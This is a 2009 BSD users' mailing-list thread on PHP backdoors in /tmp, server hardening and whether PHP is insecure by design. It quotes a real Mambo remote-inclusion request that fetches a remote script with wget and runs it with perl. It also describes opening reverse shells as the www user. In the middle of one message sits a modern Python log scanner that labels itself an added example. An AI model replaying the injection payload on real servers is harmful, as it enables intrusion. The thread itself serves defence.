From max at neuropunks.org Mon Mar 2 10:18:56 2009
From: max at neuropunks.org (Max Gribov)
Date: Mon, 02 Mar 2009 10:18:56 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
Message-ID: <49ABF8E0.7070604@neuropunks.org>

Matt Juszczak wrote:
> Evening all,
>
>
Hi Matt,

> In my latest chkrootkit reports (which I run nightly via periodic), I'm
> noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems,
> after checking the code, that it's really just searching for PHP files in
> /tmp, and also searching for some other files throughout the system.
>
> I guess the question I have is - what's the point of this check?
>
/tmp is the default storage for uploaded files (before they get moved to
their proper destination by some php code), and for php session data..
All of this is tunable through php.ini.

There are plenty of php-based backdoor scripts which allow one to execute
shell commands, transfer files, look at your db, etc.
One such thing, which seems to be really popular, is the rst shell:
http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html

I've seen that software used after a break-in into some wordpress install,
so maybe chkrootkit is checking for that. Let's hope it does a better job
than just looking at .php files though - that's like assuming all binaries
are viruses..

wow, this message is from Feb 26.. time flies when you have fun..

> -Matt
> _______________________________________________
> talk mailing list
> talk at lists.nycbug.org
> http://lists.nycbug.org/mailman/listinfo/talk
>

From akosela at andykosela.com Tue Mar 3 04:22:07 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 03 Mar 2009 10:22:07 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ABF8E0.7070604@neuropunks.org>
References: <49ABF8E0.7070604@neuropunks.org>
Message-ID: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>

Max Gribov wrote:
> Matt Juszczak wrote:
> > Evening all,
> >
> >
> Hi Matt,
>
> > In my latest chkrootkit reports (which I run nightly via periodic), I'm
> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems,
> > after checking the code, that it's really just searching for PHP files in
> > /tmp, and also searching for some other files throughout the system.
> >
> > I guess the question I have is - what's the point of this check?
> >
>
> /tmp is the default storage for uploaded files (before they get moved to
> their proper destination by some php code), and for php session data..
> All of this is tunable through php.ini.
>
> There are plenty of php-based backdoor scripts which allow one to execute
> shell commands, transfer files, look at your db, etc.
> One such thing, which seems to be really popular, is the rst shell:
> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html

Yes, /tmp is the favorite directory of all www script kiddies and other
crackers.  Mounting it noexec can help a little bit, but I also disable
world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
to open a remote reverse shell.  I really think that php websites
nowadays are number one on the crackers' list.

--Andy

From bonsaime at gmail.com Tue Mar 3 09:50:17 2009
From: bonsaime at gmail.com (Jesse Callaway)
Date: Tue, 3 Mar 2009 09:50:17 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>

On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote:
> Max Gribov wrote:
>
>> Matt Juszczak wrote:
>> > Evening all,
>> >
>> >
>> Hi Matt,
>>
>> > In my latest chkrootkit reports (which I run nightly via periodic), I'm
>> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems,
>> > after checking the code, that it's really just searching for PHP files in
>> > /tmp, and also searching for some other files throughout the system.
>> >
>> > I guess the question I have is - what's the point of this check?
>> >
>>
>> /tmp is the default storage for uploaded files (before they get moved to
>> their proper destination by some php code), and for php session data..
>> All of this is tunable through php.ini.
>>
>> There are plenty of php-based backdoor scripts which allow one to execute
>> shell commands, transfer files, look at your db, etc.
>> One such thing, which seems to be really popular, is the rst shell:
>> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html
>
> Yes, /tmp is the favorite directory of all www script kiddies and other
> crackers.  Mounting it noexec can help a little bit, but I also disable
> world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able

Cool. How do you disable execution on those? I'm guessing the file
permissions, but was hoping maybe you have some trick.

> to open a remote reverse shell.  I really think that php websites
> nowadays are number one on the crackers' list.
>
> --Andy

-jesse

From carton at Ivy.NET Tue Mar 3 15:04:13 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Tue, 03 Mar 2009 15:04:13 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> (Andy Kosela's message of "Tue, 03 Mar 2009 10:22:07 +0100")
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>

>>>>> "ak" == Andy Kosela writes:

    ak> php websites nowadays are number
    ak> one on the crackers' list.

yeah, to my memory, PHP has been a security disaster since revision 1
in the late '90s.

I'm not sure if it's the language itself, or the fact that it attracts
idiots like Visual BASIC.  I think it's the language itself.  I think
I'm becoming stupider by writing it.
-------------- next part --------------
A non-text attachment was scrubbed...
Name: not available
Type: application/pgp-signature
Size: 304 bytes
Desc: not available

From lists at zaunere.com Tue Mar 3 15:33:02 2009
From: lists at zaunere.com (Hans Zaunere)
Date: Tue, 3 Mar 2009 15:33:02 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID: <013b01c99c3f$400d5ca0$c02815e0$@com>

> ak> php websites nowadays are number
> ak> one on the crackers' list.
>
> yeah, to my memory, PHP has been a security disaster since revision 1
> in the late '90s.
>
> I'm not sure if it's the language itself, or the fact that it attracts
> idiots like Visual BASIC.  I think it's the language itself.  I think
> I'm becoming stupider by writing it.

Sorry, I can't live with this one...

http://www.nyphp.org/content/presentations/

Search for "Coding secure"

There's also a corresponding article coming out in April that provides a lot
more detail.

H

From akosela at andykosela.com Tue Mar 3 15:51:42 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 03 Mar 2009 21:51:42 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com>
Message-ID: <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com>

Jesse Callaway wrote:

> On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote:
> > Max Gribov wrote:
> >
> >> Matt Juszczak wrote:
> >> > Evening all,
> >> >
> >> >
> >> Hi Matt,
> >>
> >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm
> >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems,
> >> > after checking the code, that it's really just searching for PHP files in
> >> > /tmp, and also searching for some other files throughout the system.
> >> >
> >> > I guess the question I have is - what's the point of this check?
> >> >
> >>
> >> /tmp is the default storage for uploaded files (before they get moved to
> >> their proper destination by some php code), and for php session data..
> >> All of this is tunable through php.ini.
> >>
> >> There are plenty of php-based backdoor scripts which allow one to execute
> >> shell commands, transfer files, look at your db, etc.
> >> One such thing, which seems to be really popular, is the rst shell:
> >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html
> >
> > Yes, /tmp is the favorite directory of all www script kiddies and other
> > crackers.  Mounting it noexec can help a little bit, but I also disable
> > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
>
> Cool. How do you disable execution on those? I'm guessing the file
> permissions, but was hoping maybe you have some trick.
>

I use the simplest method which is chmod(1).  You can also employ the
BSD MAC framework for that.  The issue has been discussed recently on
freebsd-security@

Of course, those security techniques won't really help you with the more
sophisticated targeted attacks, but for the most part they help with the
majority which are non-targeted automated script attacks.
Consider this mambo abuse:

62.103.159.21 - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"

Those kinds of attacks are really easy to deploy by automated bots that
scan a large number of IPs.  They are non-targeted, but could be deadly
as well.  Most of them just use perl(1) (run as www user) to launch a
remote shell and then execute some rootkit.  By disabling execution of
programs like perl(1) for the world, you definitely can stop those basic
types of attacks.  Even the simple changing of the default application
path can help, as most of them use a simple http://host/application/
scheme.

--Andy

From akosela at andykosela.com Tue Mar 3 16:06:04 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 03 Mar 2009 22:06:04 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <013b01c99c3f$400d5ca0$c02815e0$@com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com>
Message-ID: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com>

"Hans Zaunere" wrote:

> > ak> php websites nowadays are number
> > ak> one on the crackers' list.
> >
> > yeah, to my memory, PHP has been a security disaster since revision 1
> > in the late '90s.
> >
> > I'm not sure if it's the language itself, or the fact that it attracts
> > idiots like Visual BASIC.  I think it's the language itself.  I think
> > I'm becoming stupider by writing it.
>
> Sorry, I can't live with this one...
>
> http://www.nyphp.org/content/presentations/
>
> Search for "Coding secure"
>
> There's also a corresponding article coming out in April that provides a lot
> more detail.
>

I don't want to speak for Miles here, but I think he meant that PHP is
flawed by design, and not asking "how to write secure code".  It is so
easy to exploit PHP bugs that even Visual BASIC "idiots" can do it.  It
has been increasingly harder to secure HTTP, as most of the successful
break-ins are done with the help of PHP.  And Miles remarked wisely that
this trend has been going on for years.

--Andy

From lists at zaunere.com Tue Mar 3 16:20:57 2009
From: lists at zaunere.com (Hans Zaunere)
Date: Tue, 3 Mar 2009 16:20:57 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com>
Message-ID: <019201c99c45$f159f210$d40dd630$@com>

> > http://www.nyphp.org/content/presentations/
> >
> > Search for "Coding secure"
> >
> > There's also a corresponding article coming out in April that provides a lot
> > more detail.
>
> I don't want to speak for Miles here, but I think he meant that PHP is

Ok, but I'll respond to the below for now.

> flawed by design, and not asking "how to write secure code".  It is so

Bluntly, if you don't consider them going hand in hand, there's a much
bigger problem than PHP.  Is C flawed because someone doesn't know how to
check/prevent buffer overflows?  Is Unix flawed because root lets you
wipe out the hard disk?

> easy to exploit PHP bugs that even Visual BASIC "idiots" can do it.  It
> has been increasingly harder to secure HTTP, as most of the successful
> break-ins are done with the help of PHP.  And Miles remarked wisely

Look through the presentation.  The point is that it's not about the
language - there's the developer, and most importantly, HTTP, which, if
anything, is "flawed" from a security standpoint.  Please consider the
difference between HTTP and PHP.

> this trend has been going on for years.
Web security?  PHP security?  Unfortunately, there hasn't been enough
attention to either, that's the point.

H

From max at neuropunks.org Tue Mar 3 16:26:25 2009
From: max at neuropunks.org (Max Gribov)
Date: Tue, 03 Mar 2009 16:26:25 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com>
Message-ID: <49ADA081.5030108@neuropunks.org>

Andy Kosela wrote:
>
> I don't want to speak for Miles here, but I think he meant that PHP is
> flawed by design, and not asking "how to write secure code".  It is so
> easy to exploit PHP bugs that even Visual BASIC "idiots" can do it.

It is equally easy to prevent them, just like in C you can count the
number of bytes in a string to prevent buffer overflows.

> It
> has been increasingly harder to secure HTTP, as most of the successful
> break-ins are done with the help of PHP.

I would change that to "web upload forms", "url bars in browsers" and
"javascript injection".
I bet you can find just as many vulnerable web apps written in other
languages, and probably just as many backdoor apps in other languages as
well.
php has frameworks which handle plenty of security for you (read: input
validation/sanitizing), and I'd argue that learning a framework from
scratch is easier than a language from scratch..

> And Miles remarked wisely that
> this trend has been going on for years.
>
> --Andy

From bonsaime at gmail.com Tue Mar 3 16:45:41 2009
From: bonsaime at gmail.com (Jesse Callaway)
Date: Tue, 3 Mar 2009 16:45:41 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com>

On Tue, Mar 3, 2009 at 3:51 PM, Andy Kosela wrote:
> Jesse Callaway wrote:
>
>> On Tue, Mar 3, 2009 at 4:22 AM, Andy Kosela wrote:
>> > Max Gribov wrote:
>> >
>> >> Matt Juszczak wrote:
>> >> > Evening all,
>> >> >
>> >> >
>> >> Hi Matt,
>> >>
>> >> > In my latest chkrootkit reports (which I run nightly via periodic), I'm
>> >> > noticing lots and lots of "Suspect PHP Files" (via chkrootkit). It seems,
>> >> > after checking the code, that it's really just searching for PHP files in
>> >> > /tmp, and also searching for some other files throughout the system.
>> >> >
>> >> > I guess the question I have is - what's the point of this check?
>> >> >
>> >>
>> >> /tmp is the default storage for uploaded files (before they get moved to
>> >> their proper destination by some php code), and for php session data..
>> >> All of this is tunable through php.ini.
>> >>
>> >> There are plenty of php-based backdoor scripts which allow one to execute
>> >> shell commands, transfer files, look at your db, etc.
>> >> One such thing, which seems to be really popular, is the rst shell:
>> >> http://www.sophos.com/security/analyses/viruses-and-spyware/trojrstdoora.html
>> >
>> > Yes, /tmp is the favorite directory of all www script kiddies and other
>> > crackers.  Mounting it noexec can help a little bit, but I also disable
>> > world x rights for perl, ssh, nc, sh, c, as, etc., so they won't be able
>>
>> Cool. How do you disable execution on those? I'm guessing the file
>> permissions, but was hoping maybe you have some trick.
>>
>
> I use the simplest method which is chmod(1).  You can also employ the
> BSD MAC framework for that.
> The issue has been discussed recently on
> freebsd-security@
>
> Of course, those security techniques won't really help you with the more
> sophisticated targeted attacks, but for the most part they help with the
> majority which are non-targeted automated script attacks.
>
> Consider this mambo abuse:
>
> 62.103.159.21 - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"
>
> Those kinds of attacks are really easy to deploy by automated bots that
> scan a large number of IPs.  They are non-targeted, but could be deadly
> as well.  Most of them just use perl(1) (run as www user) to launch a
> remote shell and then execute some rootkit.  By disabling execution of
> programs like perl(1) for the world, you definitely can stop those basic
> types of attacks.  Even the simple changing of the default application
> path can help, as most of them use a simple http://host/application/
> scheme.
>
> --Andy
>

Darnit, I don't think I can disable www from running perl on about 1/2
of my servers... hack me please, I'm bored... but I can turn off wget
access for sure. That one is used a lot. Good tip..thanks.

From bcully at gmail.com Tue Mar 3 16:57:06 2009
From: bcully at gmail.com (Brian Cully)
Date: Tue, 3 Mar 2009 16:57:06 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ADA081.5030108@neuropunks.org>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <49ADA081.5030108@neuropunks.org>

On 3-Mar-2009, at 16:26, Max Gribov wrote:
> Andy Kosela wrote:
>>
>> I don't want to speak for Miles here, but I think he meant that PHP
>> is
>> flawed by design, and not asking "how to write secure code".  It is
>> so
>> easy to exploit PHP bugs that even Visual BASIC "idiots" can do it.
> It is equally easy to prevent them, just like in C you can count the
> number
> of bytes in a string to prevent buffer overflows.

Bullshit.  It is much harder to prevent a million tiny errors than it is
to exploit a single one of them.  One good reason higher level languages
are useful is that they cauterize this point of failure, making entire
modes of failure impossible.  This is a good thing in an insecure world -
you're going to have enough issues dealing with the things the language
can't help you with.

>> It
>> has been increasingly harder to secure HTTP, as most of the
>> successful
>> break-ins are done with the help of PHP.
> I would change that to "web upload forms", "url bars in browsers" and
> "javascript injection".
> I bet you can find just as many vulnerable web apps written in other
> languages, and probably just as many backdoor apps in other
> languages as
> well.

Indeed.  There are some strong cases to be made for Javascript being
something of a security hole.  There are a number of efforts to close
those holes as well.  There are very few people screaming that you should
leave it alone because the security holes are fine.  Admittedly, there
are some important differences in their typical usage.  Javascript lives
in a much harsher landscape than PHP, so it's more important to lock it
down.
All that said, "mostly everything sucks anyway" is not much of an excuse
for your particular pet to suck, although it may be a decent coping
mechanism if you can't use anything better.

> php has frameworks which handle plenty of security for you (read:
> input
> validation/sanitizing), and I'd argue that learning a framework from
> scratch is easier than a language from scratch..

Believe it or not, sometimes the language itself imposes limitations on
the amount of sanitization and validation you can do at the framework
level.  PHP has some of these issues (eval, calling functions by string
reference, and so on).  And please don't flaunt the red herring of
"don't do that then."[1]

I know I've argued this before, and I'll probably be doing it until I'm
blue in the face, but just because two languages are Turing Complete
doesn't mean that they are equivalent.  It is useful to analyze and
compare languages against each other in order to pick the most
appropriate one for a job.  It is therefore useful, when discussing web
application security, to analyze languages and frameworks in terms of
their ease or difficulty in maintaining security.  Trying to drown out
any critique of your favorite language by pointing out that there are
others with similar problems, or that you can still accomplish your goals
regardless of the feature set, is ridiculous when the entire point of the
exercise is to compare and contrast languages in a given context.  The
question is not "can I do it?" but "how easy is it?"

-bjc

[1] HTTP security got you down?  Don't use HTTP!  Problem solved!

From matt at atopia.net Tue Mar 3 16:57:17 2009
From: matt at atopia.net (Matt Juszczak)
Date: Tue, 3 Mar 2009 16:57:17 -0500 (EST)
Subject: [nycbug-talk] Searching for suspect PHP files...
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com>

>> Those kinds of attacks are really easy to deploy by automated bots that
>> scan a large number of IPs.  They are non-targeted, but could be deadly
>> as well.  Most of them just use perl(1) (run as www user) to launch a
>> remote shell and then execute some rootkit.  By disabling execution of
>> programs like perl(1) for the world, you definitely can stop those basic
>> types of attacks.  Even the simple changing of the default application
>> path can help, as most of them use a simple http://host/application/
>> scheme.

perl run as the www user... well, if it's being run as the www user,
not much they can do right?  Not with the permissions of the www user,
anyway.

From carton at Ivy.NET Tue Mar 3 17:15:44 2009
From: carton at Ivy.NET (Miles Nordin)
Date: Tue, 03 Mar 2009 17:15:44 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: Hans Zaunere's message of "Tue, 3 Mar 2009 16:20:57 -0500"
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <019201c99c45$f159f210$d40dd630$@com> <49ADA081.5030108@neuropunks.org>

>>>>> "hz" == Hans Zaunere writes:
>>>>> "mg" == Max Gribov writes:
>>>>> "ak" == Andy Kosela writes:

    hz> Is C flawed because someone doesn't know how to check/prevent
    hz> buffer overflows?

emphatically, YES.

Now don't get contrary on me, Hans.  Let's burn a few of these straw men
before the thread gets hot.
Claiming something is ``flawed'' is not the same as claiming ``there is
never a case to use it, ever.''  (disagree)

However, saying ``there is a case to use it'' (agree) is not the same as
saying ``they all have their strengths and weaknesses so it's a matter of
choosing the right tool for the job, or of personal preference with no
overall judgement possible.''  (disagree)

    hz> Is Unix flawed because root lets you wipe out the hard disk?

That is not a security flaw.

    mg> I bet you can find just as many vulnerable web apps written in
    mg> other languages,

National Vulnerability Database, 2008-09-20,
  notPHP: 9 records for Plone
  PHP:    145 Drupal, 259 Joomla!, 149 WordPress
source: http://en.wikipedia.org/wiki/Plone_(software)  :p

I suspect you'll find the same in any other arena where PHP and non-PHP
software are in competition.

    ak> PHP is flawed by design, and not asking "how to write
    ak> secure code".

agree

I am more interested in how to design environments where writing secure
software is effortless.  mysql_real_escape_string is just the very tip of
a huge ``not effortless'' iceberg that explodes underwater into lack of
type safety, no uniform installation environment, a proliferation of
archaic and arcane config knobs that forcibly bleed across applications,
version skew nightmares, bleeding global state, runtime parsing, and
shell-script-type languages based on ``quoting'' and ``substitution'' in
general---every time I see & bleeding into the rendered text on Facebook
or \' rendering onto my screen in this shopping cart software, or website
logins that won't take punctuation in passwords, I think PHP, you doomed
piece of shit, you.  I do not love you.  I will NEVER love you.  Even if
you were clean I would not love you.

    ak> It is so easy to exploit PHP bugs that even Visual BASIC
    ak> "idiots" can do it.

aye, maybe so, but I didn't originally mean to call the exploiters idiots.
I meant, are the PHP webapps habitually insecure because PHP is the
low-entry-barrier language for people who spend no effort understanding
the various merits to which a programming language can aspire, so all the
worst programmers collect there, and these guys could not write a secure
webapp in any language?  and my current answer is, I don't think so, I
think the problem is mostly PHP and that the same idiots would do much
better work in another language.

    ak> Miles remarked wisely that
    ak> this trend has been going on for years.

yeah, and the full size and shape of the so-called ``web security'' trend
may be new, like FX was pointing out lurking problems with Java webapps
that like to ``serialize'' things, because you can feed a bitstream to
the web server and have it explode into some arbitrarily complicated
Object inside the web server J2EE VM.  And you pointed out problems with
super-convenient AJAX environments that encourage developers to forget
the client VM is not trustworthy.  new!

But ``PHP is a pathologically-insecure piece of shit with such a mountain
of documented incidents it's hardly worth discussing the `why' of the
matter, just run, run away, from this awful Situation'' is certainly not
new.

From max at neuropunks.org Tue Mar 3 17:26:28 2009
From: max at neuropunks.org (Max Gribov)
Date: Tue, 03 Mar 2009 17:26:28 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com>
Message-ID: <49ADAE94.1020005@neuropunks.org>

Matt Juszczak wrote:
>
> perl run as the www user... well, if it's being run as the www user,
> not much they can do right?  Not with the permissions of the www user,
> anyway.
well, you can upload a local exploit, run it as www user, gain root and
make it bind a shell or drop in some php backdoor or whatever..

Andy made a good point about using MAC, and also you can use something
like tripwire to check your upload dirs/web application source/etc, but
tripwire gets pretty tedious because someone has to parse the input..

From akosela at andykosela.com Tue Mar 3 17:48:10 2009
From: akosela at andykosela.com (Andy Kosela)
Date: Tue, 03 Mar 2009 23:48:10 +0100
Subject: [nycbug-talk] Searching for suspect PHP files...
In-Reply-To: <49ADAE94.1020005@neuropunks.org>
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <49ad985e.CV99hXLItnWIhTiS%akosela@andykosela.com> <49ADAE94.1020005@neuropunks.org>
Message-ID: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com>

Max Gribov wrote:
> Matt Juszczak wrote:
> >
> > perl run as the www user... well, if it's being run as the www user,
> > not much they can do right?  Not with the permissions of the www user,
> > anyway.
> well, you can upload a local exploit, run it as www user, gain root and
> make it bind a shell or drop in some php backdoor or whatever..

You can launch a passwordless remote shell on an arbitrary port (>1023)
using perl(1) or nc(1) as www user, then reverse bind it to your local
host bypassing any firewalls in between using ssh(1) and *then* gain root
by so many techniques that it is not even worth it to write about them
here.  My point is that sh(1), ssh(1), wget (why not use fetch?), nc(1),
cc(1), as(1), perl(1) are definitely methods of easy exploitation of your
systems even by script bots.

>
> Andy made a good point about using MAC, and also you can use something
> like tripwire to check your upload dirs/web application source/etc, but
> tripwire gets pretty tedious because someone has to parse the input..

Tripwire became a bloated beast nowadays.  I'm using mtree(8) for
checking file integrity and it is a very good tool for such a job.
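The Mambo request Andy quoted earlier in the thread is the artifact to hunt for in web logs, and it bundles three things worth flagging separately: request-superglobal overrides (`_REQUEST[...]`, `GLOBALS=`), a remote URL where a filesystem path belongs (`mosConfig_absolute_path=http://...`, a remote file inclusion), and a chained shell command that changes into /tmp, fetches a script and runs it with perl. The scanner below is an added example for this thread, not chkrootkit's code and not from any post; it parses Apache combined-format lines, URL-decodes the query by hand (so a `;` inside an injected command is not mistaken for a parameter separator), and ranks hits so that a 2xx response to a command injection, which is the case where the include probably ran, is triaged first. The sample log is constructed: the first line is the request from Andy's post with the mail wrapping removed, the other three are invented.

```python
"""Flag remote-file-inclusion and command-injection attempts in Apache logs.

Added example for this thread; not chkrootkit's code and not from any post.
"""
import re
from urllib.parse import unquote_plus

# Apache "combined" format: host ident user [time] "request" status bytes "referer" "agent"
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)
# downloaders and interpreters the automated kits chain into the injected command
SHELL_TOOLS = re.compile(r'\b(wget|curl|fetch|perl|python|nc|sh|bash)\b')
REMOTE_URL = re.compile(r'^\s*(https?|ftp)://', re.I)
# register_globals-era override keys: the request sets PHP superglobals directly
GLOBALS_KEYS = ("_REQUEST", "_GET", "_POST", "_COOKIE", "_SERVER", "GLOBALS")
# '&&' survives here only when it was sent encoded (%26%26), which is itself a tell
SHELL_SEPARATORS = (";", "|", "`", "$(", "&&")


def decode_query(target):
    """Split a request target into (path, [(key, value), ...]), URL-decoded.

    Splitting is done by hand on '&' only: parse_qsl() in older Pythons also
    splits on ';', which would cut an injected command into harmless pieces.
    """
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((unquote_plus(key), unquote_plus(value)))
    return path, params


def classify(params):
    """Return the set of indicator names matched by one request's parameters."""
    hits = set()
    for key, value in params:
        if key.startswith(GLOBALS_KEYS):
            hits.add("globals_override")
        if REMOTE_URL.match(value):
            hits.add("rfi")  # a URL where a local path or option belongs
        if any(sep in value for sep in SHELL_SEPARATORS) and (
            SHELL_TOOLS.search(value) or "/tmp" in value
        ):
            hits.add("cmd_injection")
    return hits


def severity(hits, status):
    """Triage order: a 2xx on a chained command means the include probably ran."""
    ok = 200 <= status < 300
    if "cmd_injection" in hits:
        return "high" if ok else "medium"
    if "rfi" in hits:
        return "medium" if ok else "low"
    return "info" if hits else None


def scan_log(lines):
    """Return (host, path, sorted indicators, severity) for each suspicious request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format, or a line a mail client wrapped
        path, params = decode_query(m.group("target"))
        hits = classify(params)
        sev = severity(hits, int(m.group("status")))
        if sev:
            findings.append((m.group("host"), path, sorted(hits), sev))
    return findings


# Constructed sample: line 1 is the request from Andy's post with the mail
# wrap removed; the other lines are invented benign and borderline traffic.
SAMPLE_LOG = [
    '62.103.159.21 - - [18/Aug/2006:13:58:02 -0300] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.freewebs.com/nokia-yes/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.freewebs.com/nokia-yes/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 167 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [18/Aug/2006:13:59:10 -0300] "GET /index.php?option=com_content&Itemid=1 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.8 - - [18/Aug/2006:14:01:33 -0300] "GET /index.php?option=com_login&return=http://example.com/ HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [18/Aug/2006:14:02:00 -0300] "POST /index.php HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for host, path, hits, sev in scan_log(SAMPLE_LOG):
        print(f"{sev:6} {host:15} {path} {','.join(hits)}")
```

The `return=http://example.com/` line shows why the indicators are kept separate: a lone URL-valued parameter on a redirect is low priority, while the Mambo line trips all three and got a 200, so it goes to the top of the pile and the box gets the /tmp and mtree treatment discussed above.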
--Andy

From lists at zaunere.com Tue Mar 3 17:54:25 2009
From: lists at zaunere.com (Hans Zaunere)
Date: Tue, 3 Mar 2009 17:54:25 -0500
Subject: [nycbug-talk] Searching for suspect PHP files...
References: <49ABF8E0.7070604@neuropunks.org> <49acf6bf.VcrnOm9Xl6wWmXiq%akosela@andykosela.com> <013b01c99c3f$400d5ca0$c02815e0$@com> <49ad9bbc.ctBIPICF3HsJWCTj%akosela@andykosela.com> <019201c99c45$f159f210$d40dd630$@com> <49ADA081.5030108@neuropunks.org>
Message-ID: <01d601c99c53$004dd810$00e98830$@com>

> >>>>> "hz" == Hans Zaunere writes:
...

Wow, this got complicated...

>     hz> Is C flawed because someone doesn't know how to check/prevent
>     hz> buffer overflows?
>
> emphatically, YES.

Ok, we agree.

H

From thomas at zaph.org Tue Mar 3 18:54:22 2009
From: thomas at zaph.org (N. J. Thomas)
Date: Tue, 3 Mar 2009 18:54:22 -0500
Subject: [nycbug-talk] mtree
In-Reply-To: <49adb3aa.OaTRW0SW2rM6qQmA%akosela@andykosela.com>
